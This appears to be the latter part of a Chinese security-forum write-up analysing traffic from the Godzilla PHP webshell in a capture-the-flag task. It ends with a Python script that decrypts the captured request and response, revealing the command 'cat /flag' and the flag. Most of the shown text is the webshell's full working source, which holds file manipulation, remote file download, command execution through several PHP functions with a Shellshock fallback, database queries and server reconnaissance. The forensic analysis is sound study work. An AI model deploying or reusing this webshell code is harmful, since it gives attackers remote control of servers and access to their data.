(strlen(trim($className))>0){ if ($methodName=="includeCode"){ return includeCode(); }else{ if (isset($_SES[$className])){ return eval($_SES[$className]); }else{ return "{$className} no load"; } } }else{ if (function_exists($methodName)){ return $methodName(); }else{ return "function {$methodName} not exist"; } } }else{ return "methodName Is Null"; } }catch (Exception $e){ return "ERROR://".$e -> getMessage(); } } function deleteDir($p){ $m=@dir($p); while(@$f=$m->read()){ $pf=$p."/".$f; @chmod($pf,0777); if((is_dir($pf))&&($f!=".")&&($f!="..")){ deleteDir($pf); @rmdir($pf); }else if (is_file($pf)&&($f!=".")&&($f!="..")){ @unlink($pf); } } $m->close(); @chmod($p,0777); return @rmdir($p); } function deleteFile(){ $F=get("fileName"); if(is_dir($F)){ return deleteDir($F)?"ok":"fail"; }else{ return (file_exists($F)?@unlink($F)?"ok":"fail":"fail"); } } function setFileAttr(){ $type = get("type"); $attr = get("attr"); $fileName = get("fileName"); $ret = "Null"; if ($type!=null&&$attr!=null&&$fileName!=null) { if ($type=="fileBasicAttr"){ if (@chmod($fileName,convertFilePermissions($attr))){ return "ok"; }else{ return "fail"; } }else if ($type=="fileTimeAttr"){ if (@touch($fileName,$attr)){ return "ok"; }else{ return "fail"; } }else{ return "no ExcuteType"; } }else{ $ret="type or attr or fileName is null"; } return $ret; } function fileRemoteDown(){ $url=get("url"); $saveFile=get("saveFile"); if ($url!=null&&$saveFile!=null) { $data=@file_get_contents($url); if ($data!==false){ if (@file_put_contents($saveFile,$data)!==false){ @chmod($saveFile,0777); return "ok"; }else{ return "write fail"; } }else{ return "read fail"; } }else{ return "url or saveFile is null"; } } function copyFile(){ $srcFileName=get("srcFileName"); $destFileName=get("destFileName"); if (@is_file($srcFileName)){ if (copy($srcFileName,$destFileName)){ return "ok"; }else{ return "fail"; } }else{ return "The target does not exist or is not a file"; } } function moveFile(){ $srcFileName=get("srcFileName"); $destFileName=get("destFileName"); if (rename($srcFileName,$destFileName)){ return "ok"; }else{ return "fail"; } } function getBasicsInfo() { $data = array(); $data['OsInfo'] = @php_uname(); $data['CurrentUser'] = @get_current_user(); $data['CurrentUser'] = strlen(trim($data['CurrentUser'])) > 0 ? $data['CurrentUser'] : 'NULL'; $data['REMOTE_ADDR'] = @$_SERVER['REMOTE_ADDR']; $data['REMOTE_PORT'] = @$_SERVER['REMOTE_PORT']; $data['HTTP_X_FORWARDED_FOR'] = @$_SERVER['HTTP_X_FORWARDED_FOR']; $data['HTTP_CLIENT_IP'] = @$_SERVER['HTTP_CLIENT_IP']; $data['SERVER_ADDR'] = @$_SERVER['SERVER_ADDR']; $data['SERVER_NAME'] = @$_SERVER['SERVER_NAME']; $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT']; $data['disable_functions'] = @ini_get('disable_functions'); $data['disable_functions'] = strlen(trim($data['disable_functions'])) > 0 ? $data['disable_functions'] : @get_cfg_var('disable_functions'); $data['Open_basedir'] = @ini_get('open_basedir'); $data['timezone'] = @ini_get('date.timezone'); $data['encode'] = @ini_get('exif.encode_unicode'); $data['extension_dir'] = @ini_get('extension_dir'); $data['sys_get_temp_dir'] = @sys_get_temp_dir(); $data['include_path'] = @ini_get('include_path'); $data['DOCUMENT_ROOT'] = $_SERVER['DOCUMENT_ROOT']; $data['PHP_SAPI'] = PHP_SAPI; $data['PHP_VERSION'] = PHP_VERSION; $data['PHP_INT_SIZE'] = PHP_INT_SIZE; $data['canCallGzipDecode'] = canCallGzipDecode(); $data['canCallGzipEncode'] = canCallGzipEncode(); $data['session_name'] = @ini_get("session.name"); $data['session_save_path'] = @ini_get("session.save_path"); $data['session_save_handler'] = @ini_get("session.save_handler"); $data['session_serialize_handler'] = @ini_get("session.serialize_handler"); $data['user_ini_filename'] = @ini_get("user_ini.filename"); $data['memory_limit'] = @ini_get('memory_limit'); $data['upload_max_filesize'] = @ini_get('upload_max_filesize'); $data['post_max_size'] = @ini_get('post_max_size'); $data['max_execution_time'] = @ini_get('max_execution_time'); $data['max_input_time'] = @ini_get('max_input_time'); $data['default_socket_timeout'] = @ini_get('default_socket_timeout'); $data['mygid'] = @getmygid(); $data['mypid'] = @getmypid(); $data['SERVER_SOFTWAREypid'] = @$_SERVER['SERVER_SOFTWARE']; $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT']; $data['loaded_extensions'] = @implode(',', @get_loaded_extensions()); $data['short_open_tag'] = @get_cfg_var('short_open_tag'); $data['short_open_tag'] = @(int)$data['short_open_tag'] == 1 ? 'true' : 'false'; $data['asp_tags'] = @get_cfg_var('asp_tags'); $data['asp_tags'] = (int)$data['asp_tags'] == 1 ? 'true' : 'false'; $data['safe_mode'] = @get_cfg_var('safe_mode'); $data['safe_mode'] = (int)$data['safe_mode'] == 1 ? 'true' : 'false'; $data['CurrentDir'] = str_replace('\\', '/', @dirname($_SERVER['SCRIPT_FILENAME'])); $SCRIPT_FILENAME=@dirname($_SERVER['SCRIPT_FILENAME']); $data['FileRoot'] = ''; if (substr($SCRIPT_FILENAME, 0, 1) != '/') {foreach (range('A', 'Z') as $L){ if (@is_dir("{$L}:")){ $data['FileRoot'] .= "{$L}:/;";}};}; $data['FileRoot'] = (strlen(trim($data['FileRoot'])) > 0 ? $data['FileRoot'] : '/'); $data['FileRoot']= substr_count($data['FileRoot'],substr($SCRIPT_FILENAME, 0, 1))<=0?substr($SCRIPT_FILENAME, 0, 1).":/":$data['FileRoot']; $result=""; foreach($data as $key=>$value){ $result.=$key." : ".$value."\n"; } return $result; } function getFile(){ $dir=get('dirName'); $dir=(strlen(@trim($dir))>0)?trim($dir):str_replace('\\','/',dirname(__FILE__)); $dir.="/"; $path=$dir; $allFiles = @scandir($path); $data=""; if ($allFiles!=null){ $data.="ok"; $data.="\n"; $data.=$path; $data.="\n"; foreach ($allFiles as $fileName) { if ($fileName!="."&&$fileName!=".."){ $fullPath = $path.$fileName; $lineData=array(); array_push($lineData,$fileName); array_push($lineData,@is_file($fullPath)?"1":"0"); array_push($lineData,date("Y-m-d H:i:s", @filemtime($fullPath))); array_push($lineData,@filesize($fullPath)); $fr=(@is_readable($fullPath)?"R":"").(@is_writable($fullPath)?"W":"").(@is_executable($fullPath)?"X":""); array_push($lineData,(strlen($fr)>0?$fr:"F")); $data.=(implode("\t",$lineData)."\n"); } } }else{ return "Path Not Found Or No Permission!"; } return $data; } function readFileContent(){ $fileName=get("fileName"); if (@is_file($fileName)){ if (@is_readable($fileName)){ return file_get_contents($fileName); }else{ return "No Permission!"; } }else{ return "File Not Found"; } } function uploadFile(){ $fileName=get("fileName"); $fileValue=get("fileValue"); if (@file_put_contents($fileName,$fileValue)!==false){ @chmod($fileName,0777); return "ok"; }else{ return "fail"; } } function newDir(){ $dir=get("dirName"); if (@mkdir($dir,0777,true)!==false){ return "ok"; }else{ return "fail"; } } function newFile(){ $fileName=get("fileName"); if (@file_put_contents($fileName,"")!==false){ return "ok"; }else{ return "fail"; } } function function_existsEx($functionName){ $d=explode(",",@ini_get("disable_functions")); if(empty($d)){ $d=array(); }else{ $d=array_map('trim',array_map('strtolower',$d)); } return(function_exists($functionName)&&is_callable($functionName)&&!in_array($functionName,$d)); } function execCommand(){ @ob_start(); $cmdLine=get("cmdLine"); $d=__FILE__; $cmdLine=substr($d,0,1)=="/"?"-c \"{$cmdLine}\"":"/c \"{$cmdLine}\""; if(substr($d,0,1)=="/"){ @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); }else{ @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } $executeFile=substr($d,0,1)=="/"?"sh":"cmd"; $cmdLine="{$executeFile} {$cmdLine}"; $cmdLine=$cmdLine." 2>&1"; $ret=0; if (!function_exists("runshellshock")){ function runshellshock($d, $c) { if (substr($d, 0, 1) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (function_existsEx('error_log')) { error_log("a", 1); } else { mail("a@127.0.0.1", "", "", "-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { print($output); return True; } } return False; }; } if(function_existsEx('system')){ @system($cmdLine,$ret); }elseif(function_existsEx('passthru')){ @passthru($cmdLine,$ret); }elseif(function_existsEx('shell_exec')){ print(@shell_exec($cmdLine)); }elseif(function_existsEx('exec')){ @exec($cmdLine,$o,$ret); print(join("\n",$o)); }elseif(function_existsEx('popen')){ $fp=@popen($cmdLine,'r'); while(!@feof($fp)){ print(@fgets($fp,2048)); } @pclose($fp); }elseif(function_existsEx('proc_open')){ $p = @proc_open($cmdLine, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while(!@feof($io[1])){ print(@fgets($io[1],2048)); } while(!@feof($io[2])){ print(@fgets($io[2],2048)); } @fclose($io[1]); @fclose($io[2]); @proc_close($p); }elseif(runshellshock($d, $cmdLine)) { print($ret); }elseif(substr($d,0,1)!="/" && @class_exists("COM")){ $w=new COM('WScript.shell'); $e=$w->exec($cmdLine); $so=$e->StdOut(); print($so->ReadAll()); $se=$e->StdErr(); print($se->ReadAll()); }else{ return "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock is available"; } print(($ret!=0)?"ret={$ret}":""); $result = @ob_get_contents(); @ob_end_clean(); return $result; } function execSql(){ $dbType=get("dbType"); $dbHost=get("dbHost"); $dbPort=get("dbPort"); $username=get("dbUsername"); $password=get("dbPassword"); $execType=get("execType"); $execSql=get("execSql"); function mysql_exec($host,$port,$username,$password,$execType,$sql){ // 创建连接 $conn = new mysqli($host,$username,$password,"",$port); // Check connection if ($conn->connect_error) { return $conn->connect_error; } $result = $conn->query($sql); if ($conn->error){ return $conn->error; } $result = $conn->query($sql); if ($execType=="update"){ return "Query OK, "+$conn->affected_rows+" rows affected"; }else{ $data="ok\n"; while ($column = $result->fetch_field()){ $data.=base64_encode($column->name)."\t"; } $data.="\n"; if ($result->num_rows > 0) { // 输出数据 while($row = $result->fetch_assoc()) { foreach ($row as $value){ $data.=base64_encode($value)."\t"; } $data.="\n"; } } return $data; } } function pdoExec($databaseType,$host,$port,$username,$password,$execType,$sql){ try { $conn = new PDO("{$databaseType}:host=$host;port={$port};", $username, $password); // 设置 PDO 错误模式为异常 $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); if ($execType=="update"){ return "Query OK, "+$conn->exec($sql)+" rows affected"; }else{ $data="ok\n"; $stm=$conn->prepare($sql); $stm->execute(); $row=$stm->fetch(PDO::FETCH_ASSOC); $_row="\n"; foreach (array_keys($row) as $key){ $data.=base64_encode($key)."\t"; $_row.=base64_encode($row[$key])."\t"; } $data.=$_row."\n"; while ($row=$stm->fetch(PDO::FETCH_ASSOC)){ foreach (array_keys($row) as $key){ $data.=base64_encode($row[$key])."\t"; } $data.="\n"; } return $data; } } catch(PDOException $e) { return $e->getMessage(); } } if ($dbType=="mysql"){ if (extension_loaded("mysqli")){ return mysql_exec($dbHost,$dbPort,$username,$password,$execType,$execSql); }else if (extension_loaded("pdo")){ return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$execSql); }else{ return "no extension"; } }else if (extension_loaded("pdo")){ return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$execSql); }else{ return "no extension"; } return "no extension"; } function base64Encode($data){ return base64_encode($data); } function test(){ return "ok"; } function get($key){ global $parameters; if (isset($parameters[$key])){ return $parameters[$key]; }else{ return null; } } function getAllParameters(){ global $parameters; return $parameters; } function includeCode(){ $classCode=get("binCode"); $codeName=get("codeName"); $_SES=&getSession(); $_SES[$codeName]=$classCode; return "ok"; } function base64Decode($string){ return base64_decode($string); } function convertFilePermissions($fileAttr){ $mod=0; if (strpos($fileAttr,'R')!==false){ $mod=$mod+0444; } if (strpos($fileAttr,'W')!==false){ $mod=$mod+0222; } if (strpos($fileAttr,'X')!==false){ $mod=$mod+0111; } return $mod; } function close(){ @session_start(); $_SES=&getSession(); $_SES=null; if (@session_destroy()){ return "ok"; }else{ return "fail!"; } } function bigFileDownload(){ $mode=get("mode"); $fileName=get("fileName"); $readByteNum=get("readByteNum"); $position=get("position"); if ($mode=="fileSize"){ if (@is_readable($fileName)){ return @filesize($fileName).""; }else{ return "not read"; } }elseif ($mode=="read"){ if (function_existsEx("fopen")&&function_existsEx("fread")&&function_existsEx("fseek")){ $handle=fopen($fileName,"ab+"); fseek($handle,$position); $data=fread($handle,$readByteNum); @fclose($handle); if ($data!==false){ return $data; }else{ return "cannot read file"; } }else if (function_existsEx("file_get_contents")){ return file_get_contents($fileName,false,null,$position,$readByteNum); }else{ return "no function"; } }else{ return "no mode"; } } function bigFileUpload(){ $fileName=get("fileName"); $fileContents=get("fileContents"); $position=get("position"); if(function_existsEx("fopen")&&function_existsEx("fwrite")&&function_existsEx("fseek")){ $handle=fopen($fileName,"ab+"); if ($handle!==false){ fseek($handle,$position); $len=fwrite($handle,$fileContents); if ($len!==false){ return "ok"; }else{ return "cannot write file"; } @fclose($handle); }else{ return "cannot open file"; } }else if (function_existsEx("file_put_contents")){ if (file_put_contents($fileName,$fileContents,FILE_APPEND)!==false){ return "ok"; }else{ return "writer fail"; } }else{ return "no function"; } } function canCallGzipEncode(){ if (function_existsEx("gzencode")){ return "1"; }else{ return "0"; } } function canCallGzipDecode(){ if (function_existsEx("gzdecode")){ return "1"; }else{ return "0"; } } function bytesToInteger($bytes, $position) { $val = 0; $val = $bytes[$position + 3] & 0xff; $val <<= 8; $val |= $bytes[$position + 2] & 0xff; $val <<= 8; $val |= $bytes[$position + 1] & 0xff; $val <<= 8; $val |= $bytes[$position] & 0xff; return $val; } function isGzipStream($bin){ if (strlen($bin)>=2){ $bin=substr($bin,0,2); $strInfo = @unpack("C2chars", $bin); $typeCode = intval($strInfo['chars1'].$strInfo['chars2']); switch ($typeCode) { case 31139: return true; break; default: return false; } }else{ return false; } } function getBytes($string) { $bytes = array(); for($i = 0; $i < strlen($string); $i++){ array_push($bytes,ord($string[$i])); } return $bytes; } ``` 然后分析第一段的php我们可以知道哥斯拉是不落地木马,其变量都保存在内存进程中,然后每次都会用gzencode也就是gzip压缩,使用的php的方法所以我们只能用php的方法来解,我们继续分析后面的流量,最后一个流量是 ```php pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTh1ICWCl3T2Dlffl9LdSpe0j5qneQcq98UNA0fsVlxxBe14XeR9%2FGMTU0pI7iA2M2ZQ%3D%3D ``` 和 ```php 72a9c691ccdaab98fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=b4c4e1f6ddd2a488 ``` 重要的就是key的值`key=fL1tMGI4YTljMX78f8Wo%2FyhTh1ICWCl3T2Dlffl9LdSpe0j5qneQcq98UNA0fsVlxxBe14XeR9%2FGMTU0pI7iA2M2ZQ%3D%3D` 然后我们根据上面的思路写出解密脚本 ```php import base64 import os def decode(D,K): D = list(D) for i in range(len(D)): c = K[i+1&15] D[i] = D[i]^c return bytes(D) _pass = 'pass' key = '3c6e0b8a9c15224a' p='fL1tMGI4YTljMX78f8Wo/yhTh1ICWCl3T2Dlffl9LdSpe0j5qneQcq98UNA0fsVlxxBe14XeR9/GMTU0pI7iA2M2ZQ==' a = os.popen(r'php -r echo(base64_encode(gzencode("test")));').read() print(a) p1 = base64.b64decode(p) res = decode(p1,key.encode()) r1 = base64.b64encode(res).decode() r2 = os.popen('php -r \'echo(gzdecode(base64_decode("'+r1+'")));\'').read() print(r2) ``` 然后key的值我们可以解出来 ```php cmdLine cat /flag methodName execCommand ``` 下面的返回我们取16个字符后的base64`fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=`我们可以解出: ```php flag{5db5b7b0bb74babb66e1522f3a6b1b12} ```
发表于 2021-10-05 18:48:08
阅读 ( 7513 )
分类:
WEB安全
3 推荐
收藏
0 条评论
请先
登录
后评论
Johnson666
19 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!